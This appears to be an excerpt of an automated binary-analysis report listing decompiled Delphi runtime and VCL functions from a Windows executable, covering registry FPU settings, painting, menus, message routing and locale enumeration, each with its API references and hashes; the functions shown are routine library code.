    • Instruction ID: a88dfb39b16e47c9de266cc581526034df6ee9f0b2d60ce30e4bcf8b329ee864
    • Opcode Fuzzy Hash: d28a535c856f93c6a4f2099c5b9d9603b9f422e21454ec69e133c63dd92d6dbe
    • Instruction Fuzzy Hash: 5021B330A14204EED711EFA5C8A1BEEB7F8EF05304F55847AE414A62D1D77C9D90CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E004032E0() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x479020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x479020; // 0x1372
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x479020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00403351);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403358);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403302
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403335
    • RegCloseKey.ADVAPI32(?,00403358,00000000,?,00000004,00000000,00403351,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040334B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CloseOpenQueryValue
    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
    • API String ID: 3677997916-4173385793
    • Opcode ID: d51f590f3b47781ab56e038d20767543010de86fd7e3ec06f9fed5876e474b14
    • Instruction ID: 484a0184172b21eeaec57baafc58b867f6ad0a94555a977e479d281095782bf4
    • Opcode Fuzzy Hash: d51f590f3b47781ab56e038d20767543010de86fd7e3ec06f9fed5876e474b14
    • Instruction Fuzzy Hash: 9D017579A50348BADB11EF91CD82FAD77BCEB08701F6001B6B904F65D0E6785A50C75C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00425610(void* __ecx) {
    				struct HINSTANCE__* _t7;
    				struct HINSTANCE__* _t9;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t16;
    				intOrPtr _t19;
    
    				_push(_t19);
    				_push(0x42567f);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t19;
    				 *0x47bac8 =  *0x47bac8 + 1;
    				if( *0x47bac8 == 0) {
    					if( *0x47bacc != 0) {
    						_t9 =  *0x47bacc; // 0x0
    						FreeLibrary(_t9);
    					}
    					if( *0x47bad0 != 0) {
    						_t7 =  *0x47bad0; // 0x0
    						FreeLibrary(_t7);
    					}
    					_t15 =  *0x425570; // 0x425574
    					E00404C20(0x4798e4, _t15);
    					_t16 =  *0x425570; // 0x425574
    					E00404C20(0x4798d8, _t16);
    				}
    				_pop(_t14);
    				 *[fs:eax] = _t14;
    				_push(0x425686);
    				return 0;
    			}

    APIs
    • FreeLibrary.KERNEL32(00000000,00000000,0042567F), ref: 00425638
    • FreeLibrary.KERNEL32(00000000,00000000,0042567F), ref: 0042564C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FreeLibrary
    • String ID: \UB$\UB$tUB
    • API String ID: 3664257935-1928697032
    • Opcode ID: 755789ffe76009dbdbc9caf21a59f898bd655be3ab5ff13d5e855cf5134ae907
    • Instruction ID: 1c60eac0ed794dc18dcee17fc6a9feea87a942e861012fce1fd09beb1d7731ca
    • Opcode Fuzzy Hash: 755789ffe76009dbdbc9caf21a59f898bd655be3ab5ff13d5e855cf5134ae907
    • Instruction Fuzzy Hash: 37F09A70304A009FD722BB25FC15B2233A8F785300BC6847BE508C2AA4D3BC9C92CB9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00444154(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr* _v8;
    				int _t100;
    				int _t102;
    				intOrPtr _t119;
    				int _t124;
    				intOrPtr _t157;
    				signed char _t165;
    				signed char _t166;
    				void* _t168;
    				signed char _t183;
    				intOrPtr _t185;
    				intOrPtr _t197;
    				void* _t200;
    				void* _t202;
    				int _t203;
    				intOrPtr _t207;
    				void* _t209;
    				signed char _t210;
    
    				_t200 = __edi;
    				_t206 = _t207;
    				_t202 = __edx;
    				_v8 = __eax;
    				E0042EF10(_v8);
    				_push(_t207);
    				_push(0x4443bc);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t207;
    				 *(_v8 + 0x268) = 0;
    				 *(_v8 + 0x26c) = 0;
    				 *(_v8 + 0x270) = 0;
    				_t168 = 0;
    				_t209 = E004033F8( *_v8) -  *0x440fe8; // 0x441034
    				if(_t209 == 0) {
    					_t165 =  *0x47b65d; // 0x0
    					_t166 = _t165 ^ 0x00000001;
    					_t210 = _t166;
    					 *(_v8 + 0x234) = _t166;
    				}
    				E0042E66C(_v8, _t168, _t202, _t210);
    				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
    					L14:
    					_t100 =  *(_v8 + 0x268);
    					_t219 = _t100;
    					if(_t100 > 0) {
    						E0042B974(_v8, _t100, _t219);
    					}
    					_t102 =  *(_v8 + 0x26c);
    					_t220 = _t102;
    					if(_t102 > 0) {
    						E0042B9B8(_v8, _t102, _t220);
    					}
    					_t183 =  *0x4443c8; // 0x0
    					 *(_v8 + 0x98) = _t183;
    					_t221 = _t168;
    					if(_t168 == 0) {
    						E004437B4(_v8, 1, 1);
    						E004320D0(_v8, 1, 1, _t221);
    					}
    					E0042D0C4(_v8, 0, 0xb03d, 0);
    					_pop(_t185);
    					 *[fs:eax] = _t185;
    					_push(0x4443c3);
    					return E0042EF18(_v8);
    				} else {
    					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
    						_t197 =  *0x47bba0; // 0x2321310
    						_t23 = _t197 + 0x40; // 0x60
    						if( *(_v8 + 0x25c) !=  *_t23) {
    							_t157 =  *0x47bba0; // 0x2321310
    							_t26 = _t157 + 0x40; // 0x60
    							E0041CA50( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041CA48( *((intOrPtr*)(_v8 + 0x68))),  *_t26,  *(_v8 + 0x25c)), _t200, _t206);
    						}
    					}
    					_t119 =  *0x47bba0; // 0x2321310
    					_t29 = _t119 + 0x40; // 0x60
    					 *(_v8 + 0x25c) =  *_t29;
    					_t203 = E004444EC(_v8);
    					_t124 =  *(_v8 + 0x270);
    					_t215 = _t203 - _t124;
    					if(_t203 != _t124) {
    						_t168 = 1;
    						E004437B4(_v8, _t124, _t203);
    						E004320D0(_v8,  *(_v8 + 0x270), _t203, _t215);
    						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
    							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
    						}
    						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
    							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
    						}
    						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
    							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
    							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
    						}
    					}
    					goto L14;
    				}
    			}

    APIs
    • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 00444225
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004442A1
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004442D0
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004442FF
    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00444322
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd451bca6ec8968766b4cdbe1f8e4332541abe440ea9dc8db5020fef113309d7
    • Instruction ID: f103d02a6e5df238344e8f5a8e094d9055898c63f1c7f074f4753733dc3936e2
    • Opcode Fuzzy Hash: bd451bca6ec8968766b4cdbe1f8e4332541abe440ea9dc8db5020fef113309d7
    • Instruction Fuzzy Hash: 0671B274B04108EFDB04DBA9C589BAEB7F5AF48304F6941F5A808DB362CB75AE41DB44
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0043BC8C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				struct tagRECT _v32;
    				void* _t53;
    				int _t63;
    				CHAR* _t65;
    				void* _t76;
    				void* _t78;
    				int _t89;
    				CHAR* _t91;
    				int _t117;
    				intOrPtr _t127;
    				void* _t139;
    				void* _t144;
    				char _t153;
    
    				_t120 = __ecx;
    				_t143 = _t144;
    				_v16 = 0;
    				_v12 = __ecx;
    				_v8 = __edx;
    				_t139 = __eax;
    				_t117 = _a4;
    				_push(_t144);
    				_push(0x43be70);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t144 + 0xffffffe4;
    				_t53 = E0043DC64(__eax);
    				_t135 = _t53;
    				if(_t53 != 0 && E0043F2D0(_t135) != 0) {
    					if((_t117 & 0x00000000) != 0) {
    						__eflags = (_t117 & 0x00000002) - 2;
    						if((_t117 & 0x00000002) == 2) {
    							_t117 = _t117 & 0xfffffffd;
    							__eflags = _t117;
    						}
    					} else {
    						_t117 = _t117 & 0xffffffff | 0x00000002;
    					}
    					_t117 = _t117 | 0x00020000;
    				}
    				E00404278( &_v16, _v12);
    				if((_t117 & 0x00000004) == 0) {
    					L12:
    					E004045EC(_v16, 0x43be94);
    					if(_t153 != 0) {
    						E0041D150( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
    						__eflags =  *((char*)(_t139 + 0x3a));
    						if( *((char*)(_t139 + 0x3a)) != 0) {
    							_t136 =  *((intOrPtr*)(_v8 + 0xc));
    							__eflags = E0041CB28( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be98;
    							E0041CB34( *((intOrPtr*)(_v8 + 0xc)), E0041CB28( *((intOrPtr*)(_v8 + 0xc))) |  *0x43be98, _t136, _t139, _t143);
    						}
    						__eflags =  *((char*)(_t139 + 0x39));
    						if( *((char*)(_t139 + 0x39)) != 0) {
    							L24:
    							_t63 = E004044A0(_v16);
    							_t65 = E004046A0(_v16);
    							DrawTextA(E0041D6C0(_v8), _t65, _t63, _a12, _t117);
    							L25:
    							_pop(_t127);
    							 *[fs:eax] = _t127;
    							_push(0x43be77);
    							return E004041E0( &_v16);
    						} else {
    							__eflags = _a8;
    							if(_a8 == 0) {
    								OffsetRect(_a12, 1, 1);
    								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
    								_t89 = E004044A0(_v16);
    								_t91 = E004046A0(_v16);
    								DrawTextA(E0041D6C0(_v8), _t91, _t89, _a12, _t117);
    								OffsetRect(_a12, 0xffffffff, 0xffffffff);
    							}
    							__eflags = _a8;
    							if(_a8 == 0) {
    								L23:
    								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
    							} else {
    								_t76 = E0041C3A8(0xff00000d);
    								_t78 = E0041C3A8(0xff000010);
    								__eflags = _t76 - _t78;
    								if(_t76 != _t78) {
    									goto L23;
    								}
    								E0041C868( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
    							}
    							goto L24;
    						}
    					}
    					if((_t117 & 0x00000004) == 0) {
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						_v32.top = _v32.top + 4;
    						DrawEdge(E0041D6C0(_v8),  &_v32, 6, 2);
    					}
    					goto L25;
    				} else {
    					if(_v16 == 0) {
    						L11:
    						E004044A8( &_v16, 0x43be88);
    						goto L12;
    					}
    					if( *_v16 != 0x26) {
    						goto L12;
    					}
    					_t153 =  *((char*)(_v16 + 1));
    					if(_t153 != 0) {
    						goto L12;
    					}
    					goto L11;
    				}
    			}

    APIs
    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043BD5B
    • OffsetRect.USER32(?,00000001,00000001), ref: 0043BDAC
    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BDE1
    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043BDEE
    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043BE55
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Draw$OffsetRectText$Edge
    • String ID:
    • API String ID: 3610532707-0
    • Opcode ID: dc624f298eb8b9222ed68f25da1ce54a54011090f051fe7b4520495c77b33999
    • Instruction ID: bf503c7933756eef2c6ba3c77e40b18067cc4d6b2622ffbda7aec3605c63bc03
    • Opcode Fuzzy Hash: dc624f298eb8b9222ed68f25da1ce54a54011090f051fe7b4520495c77b33999
    • Instruction Fuzzy Hash: 24515270A00208AFDB20EBA9C882BDE77E5EF49314F54956AFA14E7391C73DDD408759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E004302C0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				int _v16;
    				int _v20;
    				struct tagPAINTSTRUCT _v84;
    				intOrPtr _t55;
    				void* _t64;
    				struct HDC__* _t75;
    				intOrPtr _t84;
    				void* _t95;
    				void* _t96;
    				void* _t98;
    				void* _t100;
    				void* _t101;
    				intOrPtr _t102;
    
    				_t100 = _t101;
    				_t102 = _t101 + 0xffffffb0;
    				_v12 = __edx;
    				_v8 = __eax;
    				_t75 =  *(_v12 + 4);
    				if(_t75 == 0) {
    					_t75 = BeginPaint(E0043260C(_v8),  &_v84);
    				}
    				_push(_t100);
    				_push(0x4303e0);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t102;
    				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
    					_v20 = SaveDC(_t75);
    					_v16 = 2;
    					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
    					if(_t95 >= 0) {
    						_t96 = _t95 + 1;
    						_t98 = 0;
    						do {
    							_t64 = E00413E68( *((intOrPtr*)(_v8 + 0x198)), _t98);
    							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
    								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
    									goto L11;
    								} else {
    									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
    									if(_v16 != 1) {
    										goto L11;
    									}
    								}
    							} else {
    								goto L11;
    							}
    							goto L12;
    							L11:
    							_t98 = _t98 + 1;
    							_t96 = _t96 - 1;
    						} while (_t96 != 0);
    					}
    					L12:
    					if(_v16 != 1) {
    						 *((intOrPtr*)( *_v8 + 0xb8))();
    					}
    					RestoreDC(_t75, _v20);
    				} else {
    					 *((intOrPtr*)( *_v8 + 0xb8))();
    				}
    				E00430418(_v8, 0, _t75);
    				_pop(_t84);
    				 *[fs:eax] = _t84;
    				_push(0x4303e7);
    				_t55 = _v12;
    				if( *((intOrPtr*)(_t55 + 4)) == 0) {
    					return EndPaint(E0043260C(_v8),  &_v84);
    				}
    				return _t55;
    			}

    APIs
    • BeginPaint.USER32(00000000,?), ref: 004302E6
    • SaveDC.GDI32(?), ref: 0043031A
    • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043037C
    • RestoreDC.GDI32(?,?), ref: 004303A6
    • EndPaint.USER32(00000000,?,004303E7), ref: 004303DA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Paint$BeginClipExcludeRectRestoreSave
    • String ID:
    • API String ID: 3808407030-0
    • Opcode ID: 1b4e823e658fec81593b4ed5328e34a95f368c9df9a536e2acdbfa43cd59a409
    • Instruction ID: 92525e9a76e932aa0f2fb9871a67fd2cb257035e12fd4955e1c6b845fdebbd08
    • Opcode Fuzzy Hash: 1b4e823e658fec81593b4ed5328e34a95f368c9df9a536e2acdbfa43cd59a409
    • Instruction Fuzzy Hash: 0B415E70A04204EFCB10DF99C895FAEB7F9AF48304F1591EAE9049B362D7799D45CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0043BACC(int __eax, void* __edx) {
    				signed int _t39;
    				signed int _t40;
    				intOrPtr _t44;
    				int _t46;
    				int _t47;
    				intOrPtr* _t48;
    
    				_t18 = __eax;
    				_t48 = __eax;
    				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
    					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
    						 *((char*)(__eax + 0x74)) = 1;
    						return __eax;
    					}
    					_t19 =  *((intOrPtr*)(__eax + 0x6c));
    					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
    						return E0043BACC(_t19, __edx);
    					}
    					_t18 = GetMenuItemCount(E0043BBFC(__eax));
    					_t47 = _t18;
    					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
    					while(_t47 > 0) {
    						_t46 = _t47 - 1;
    						_t18 = GetMenuState(E0043BBFC(_t48), _t46, 0x400);
    						if((_t18 & 0x00000004) == 0) {
    							_t18 = RemoveMenu(E0043BBFC(_t48), _t46, 0x400);
    							_t40 = 1;
    						}
    						_t47 = _t47 - 1;
    					}
    					if(_t40 != 0) {
    						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
    							L14:
    							E0043B98C(_t48);
    							L15:
    							return  *((intOrPtr*)( *_t48 + 0x3c))();
    						}
    						_t44 =  *0x43a5e0; // 0x43a62c
    						if(E00403604( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043BBFC(_t48)) != 0) {
    							goto L14;
    						} else {
    							DestroyMenu( *(_t48 + 0x34));
    							 *(_t48 + 0x34) = 0;
    							goto L15;
    						}
    					}
    				}
    				return _t18;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 345d683e530d82ef900e8a6c12976ded95712800132fcc7e62802ecc1939fe08
    • Instruction ID: e675c4ec0419a1bfc29a1ff7c5c5bc2ec16fc4e3f05f7452554d88f8db3284e7
    • Opcode Fuzzy Hash: 345d683e530d82ef900e8a6c12976ded95712800132fcc7e62802ecc1939fe08
    • Instruction Fuzzy Hash: 4C119D217413495ACA20BA3B8845B5BB688DF48708F04242BBE41EB78BCF3CEC4586D8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0044AFBC(void* __eax, void* __ecx, struct HWND__** __edx) {
    				intOrPtr _t11;
    				intOrPtr _t20;
    				void* _t30;
    				void* _t31;
    				void* _t33;
    				struct HWND__** _t34;
    				struct HWND__* _t35;
    				struct HWND__* _t36;
    
    				_t31 = __ecx;
    				_t34 = __edx;
    				_t33 = __eax;
    				_t30 = 0;
    				_t11 =  *((intOrPtr*)(__edx + 4));
    				if(_t11 < 0x100 || _t11 > 0x108) {
    					L16:
    					return _t30;
    				} else {
    					_t35 = GetCapture();
    					if(_t35 != 0) {
    						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x47b660 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
    							_t30 = 1;
    						}
    						goto L16;
    					}
    					_t36 =  *_t34;
    					_t2 = _t33 + 0x44; // 0x0
    					_t20 =  *_t2;
    					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
    						L7:
    						if(E00428E38(_t36, _t31) == 0 && _t36 != 0) {
    							_t36 = GetParent(_t36);
    							goto L7;
    						}
    						if(_t36 == 0) {
    							_t36 =  *_t34;
    						}
    						goto L11;
    					} else {
    						_t36 = E0043260C(_t20);
    						L11:
    						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
    							_t30 = 1;
    						}
    						goto L16;
    					}
    				}
    			}

    APIs
    • GetCapture.USER32 ref: 0044AFDF
    • SendMessageA.USER32(00000000,-0000BBEE,02321704,?), ref: 0044B033
    • GetWindowLongA.USER32(00000000,000000FA), ref: 0044B043
    • SendMessageA.USER32(00000000,-0000BBEE,02321704,?), ref: 0044B062
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: MessageSend$CaptureLongWindow
    • String ID:
    • API String ID: 1158686931-0
    • Opcode ID: 8ff585689c1292dc53cb565c5658c17b8c81167e6c6a91dc2ca0f314fbb66222
    • Instruction ID: ce9d20ffbc85f04639abf66609b3bcef8b162e8f3b4ccc9a087dab5e2302bab9
    • Opcode Fuzzy Hash: 8ff585689c1292dc53cb565c5658c17b8c81167e6c6a91dc2ca0f314fbb66222
    • Instruction Fuzzy Hash: C61190712046089FE670FA59C980F27B3DCDB18316F10453AF97AD3352DB29EC1086AC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0041F3FC(int __eax, void* __ecx, intOrPtr __edx) {
    				intOrPtr _v8;
    				int _v12;
    				struct HDC__* _v16;
    				void* _v20;
    				struct tagRGBQUAD _v1044;
    				int _t16;
    				struct HDC__* _t18;
    				int _t31;
    				int _t34;
    				intOrPtr _t41;
    				void* _t43;
    				void* _t46;
    				void* _t48;
    				intOrPtr _t49;
    
    				_t16 = __eax;
    				_t46 = _t48;
    				_t49 = _t48 + 0xfffffbf0;
    				_v8 = __edx;
    				_t43 = __eax;
    				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
    					L4:
    					return _t16;
    				} else {
    					_t16 = E0041E24C(_v8, 0xff,  &_v1044);
    					_t34 = _t16;
    					if(_t34 == 0) {
    						goto L4;
    					} else {
    						_push(0);
    						L0040677C();
    						_v12 = _t16;
    						_t18 = _v12;
    						_push(_t18);
    						L00406484();
    						_v16 = _t18;
    						_v20 = SelectObject(_v16, _t43);
    						_push(_t46);
    						_push(0x41f4ab);
    						_push( *[fs:eax]);
    						 *[fs:eax] = _t49;
    						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
    						_pop(_t41);
    						 *[fs:eax] = _t41;
    						_push(0x41f4b2);
    						SelectObject(_v16, _v20);
    						DeleteDC(_v16);
    						_t31 = _v12;
    						_push(_t31);
    						_push(0);
    						L004069B4();
    						return _t31;
    					}
    				}
    			}

    APIs
      • Part of subcall function 0041E24C: GetObjectA.GDI32(?,00000004), ref: 0041E263
    • 72E7AC50.USER32(00000000), ref: 0041F43A
    • SelectObject.GDI32(?), ref: 0041F453
    • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0041F4AB,?,?,?,?,00000000), ref: 0041F477
    • SelectObject.GDI32(?,?), ref: 0041F491
    • DeleteDC.GDI32(?), ref: 0041F49A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Object$Select$ColorDeleteTable
    • String ID:
    • API String ID: 3648526112-0
    • Opcode ID: 10c1d51566b293bbbafad24e6ac4afff0f1c063a64f53df5720c4e02d758f858
    • Instruction ID: f2b03904cd55be4bff268b22f999539e693adff57f6e84c6c544d3dcf3cce47d
    • Opcode Fuzzy Hash: 10c1d51566b293bbbafad24e6ac4afff0f1c063a64f53df5720c4e02d758f858
    • Instruction Fuzzy Hash: 19115172E102096FDB11EBE9DC51AAEB3FCEB08704F0144BAB504E7281D67C9E948B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0040B0D8(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40b16f);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E0040AE50(GetThreadLocale(), 0x40b184, 0x100b,  &_v8);
    				_t29 = E00408140(0x40b184, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E0040B024, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x47b764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E0040B060, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040B176);
    				return E004041E0( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040B16F,?,?,00000000), ref: 0040B0F0
      • Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040B16F,?,?,00000000), ref: 0040B120
    • EnumCalendarInfoA.KERNEL32(Function_0000B024,00000000,00000000,00000004), ref: 0040B12B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040B16F,?,?,00000000), ref: 0040B149
    • EnumCalendarInfoA.KERNEL32(Function_0000B060,00000000,00000000,00000003), ref: 0040B154
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
